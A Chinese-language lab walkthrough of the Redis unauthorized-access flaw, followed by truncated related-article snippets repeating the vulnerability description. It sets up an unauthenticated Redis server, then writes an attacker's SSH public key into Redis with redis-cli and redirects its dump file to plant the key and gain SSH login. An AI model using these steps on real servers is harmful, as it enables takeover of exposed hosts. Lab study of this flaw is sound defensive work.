在伺服器上開啟redis服務
wget
解壓
tar -xvf redis-stable.tar.gz
進入資料夾,編譯
make
編譯完成之後,修改redis.conf 中的daemonize從no改為yes,允許後台執行,並修改服務監聽的位址為伺服器ip。
進入src資料夾,使用redis.conf配置來執行服務
./redis-server /usr/redis-stable/redis.conf
檢視運**況
執行src資料夾中的redis-cli,進入服務,此時未設定密碼
且伺服器已開啟ssh服務
service ssh start
service ssh status
攻擊方
生成rsa金鑰檔案,預設存放在/root/.ssh/id_rsa,伺服器上也需要有此路徑才能成功
將公鑰寫入到此資料夾的乙個空檔案中
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n"; ) > fooing.txt
回到redis的src資料夾中執行redis-cli,將該公鑰插入redis伺服器中,設定使用者名為foo
cat /root/.ssh/fooing.txt | ./redis-cli -h 192.168.23.128 -x set foo
再嘗試登入redis伺服器,發現redis伺服器已經被插入foo賬戶,接著修改配置資料夾為rsa金鑰存放的路徑,並設定dbfilename,以此中資訊登入
最後以該rsa的私鑰登入成功目標主機
Redis未授權訪問漏洞
一 漏洞描述和危害 redis因配置不當可以未授權訪問,被攻擊者惡意利用。攻擊者無需認證訪問到內部資料,可能導致敏感資訊洩露,黑客也可以惡意執行flushall來清空所有資料。攻擊者可通過eval執行lua 或通過資料備份功能往磁碟寫入後門檔案。如果redis以root身份執行,黑客可以給root賬...
Redis未授權訪問漏洞
一 漏洞描述和危害 redis因配置不當可以未授權訪問,被攻擊者惡意利用。攻擊者無需認證訪問到內部資料,可能導致敏感資訊洩露,黑客也可以惡意執行flushall來清空所有資料。攻擊者可通過eval執行lua 或通過資料備份功能往磁碟寫入後門檔案,如果redis以root身份執行,黑客可以給root賬...
redis未授權訪問漏洞
1 什麼是redis?redis是乙個開源的使用ansi c語言編寫 支援網路 可基於記憶體亦可持久化的日誌型 key value資料庫,並提供多種語言的api。2.redis 未授權訪問是什麼漏洞?redis是預設繫結在0.0.0.0 6379,並且沒有開啟認證,如果沒有採取相關的一些策略,比如新...